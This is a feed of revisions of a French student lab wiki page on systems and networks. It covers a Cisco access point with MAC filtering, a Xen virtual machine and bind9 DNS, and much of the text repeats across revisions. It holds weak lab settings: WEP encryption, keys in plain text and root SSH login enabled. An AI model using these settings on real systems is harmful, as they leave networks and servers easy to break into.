&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    1  /etc/ssh/sshd_config&lt;br /&gt;
    2  vim /etc/ssh/sshd_config&lt;br /&gt;
    3  /etc/ssh/sshd_config&lt;br /&gt;
    4  ls &lt;br /&gt;
    5  vi /etc/ssh/sshd_config&lt;br /&gt;
    6  vi /etc/network/interfaces&lt;br /&gt;
    7  ifdown eth0&lt;br /&gt;
    8  ifup eth0&lt;br /&gt;
    9  apt-get purge network-manager&lt;br /&gt;
   10  apt-get purge systemd&lt;br /&gt;
   11  apt-get purge network-manager systemd&lt;br /&gt;
   12  apt-get purge systemd&lt;br /&gt;
   13  apt-get purge network-manager systemd&lt;br /&gt;
   14  ifup eth0&lt;br /&gt;
   15  vi /etc/ssh/sshd_config&lt;br /&gt;
   16  route -n&lt;br /&gt;
   17  cat /etc/network/interfaces&lt;br /&gt;
   18  nano /etc/network/interfaces&lt;br /&gt;
   19  apt-get purge network-manager systemd&lt;br /&gt;
   20  apt-get purge network-manager &lt;br /&gt;
   21  apt-get purge systemd&lt;br /&gt;
   22  ifdown eth0&lt;br /&gt;
   23  ifup eth0&lt;br /&gt;
   24  apt-get purge systemd&lt;br /&gt;
   25  route -n&lt;br /&gt;
   26  apt-get purge systemd&lt;br /&gt;
   27  apt-get purge systemd&lt;br /&gt;
   28  route -n&lt;br /&gt;
   29  reboot&lt;br /&gt;
   30  /etc/ssh/sshd_config&lt;br /&gt;
   31  su&lt;br /&gt;
   32  apt-get purge network-manager systemd&lt;br /&gt;
   33  nano /etc/inittab &lt;br /&gt;
   34  cat /etc/inittab &lt;br /&gt;
   35  apt-get purge systemd&lt;br /&gt;
   36  reboot&lt;br /&gt;
   37  apt-get purge systemd&lt;br /&gt;
   38  ping www.google.com&lt;br /&gt;
   39  bind9&lt;br /&gt;
   40  /etc/bind/&lt;br /&gt;
   41  apt-get bind9&lt;br /&gt;
   42  apt-get install bind9&lt;br /&gt;
   43  cat /etc/bind/named.conf&lt;br /&gt;
   44  cat /etc/bind/named.conf.options &lt;br /&gt;
   45  cat /etc/bind/named.conf.local &lt;br /&gt;
   46  apt-get install bind9-doc&lt;br /&gt;
   47  show ip &lt;br /&gt;
   48  showip&lt;br /&gt;
   49  cat /etc/network/interfaces&lt;br /&gt;
   50  apt-get install ssh&lt;br /&gt;
   51  apt-get install apache2&lt;br /&gt;
   52  cat /var/log/daemon.log &lt;br /&gt;
   53  host www.hunt3r.lol localhost&lt;br /&gt;
   54  vi /etc/bind/named.conf.options&lt;br /&gt;
   55  vi /etc/bind/named.conf.local&lt;br /&gt;
   56  vi /etc/bind/named.conf.options &lt;br /&gt;
   57  vim /etc/bind/named.conf.options &lt;br /&gt;
   58  nano /etc/bind/named.conf.options &lt;br /&gt;
   59  apt-get install vim strace tcpdump &lt;br /&gt;
   60  apt-get install host&lt;br /&gt;
   61  host -t ni love-in-the-world.space&lt;br /&gt;
   62  host -t any love-in-the-world.space&lt;br /&gt;
   63  cd /etc/bind&lt;br /&gt;
   64  ls&lt;br /&gt;
   65  vim named.conf&lt;br /&gt;
   66  cat  named.conf&lt;br /&gt;
   67  ls&lt;br /&gt;
   68  vim named.conf.options &lt;br /&gt;
   69  cp db.local db.love-in-the-world&lt;br /&gt;
   70  cat named.conf.default-zones &lt;br /&gt;
   71  vim named.conf.local &lt;br /&gt;
   72  cat named.conf.local &lt;br /&gt;
   73  vim db.love-in-the-world &lt;br /&gt;
   74  vim db.love-in-the-world &lt;br /&gt;
   75  service bind9 stop&lt;br /&gt;
   76  service bind9 start&lt;br /&gt;
   77  cat /var/log/daemon.log&lt;br /&gt;
   78  vim db.love-in-the-world &lt;br /&gt;
   79  service bind9 stop&lt;br /&gt;
   80  vim db.love-in-the-world &lt;br /&gt;
   81  service bind9 start&lt;br /&gt;
   82  cat /var/log/daemon.log&lt;br /&gt;
   83  cat /var/log/daemon.log&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22774</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22774"/>
				<updated>2015-11-06T11:08:39Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
on se connecte a notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22770</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22770"/>
				<updated>2015-11-06T09:45:08Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
on se connecte a notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22767</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22767"/>
				<updated>2015-11-06T09:43:18Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
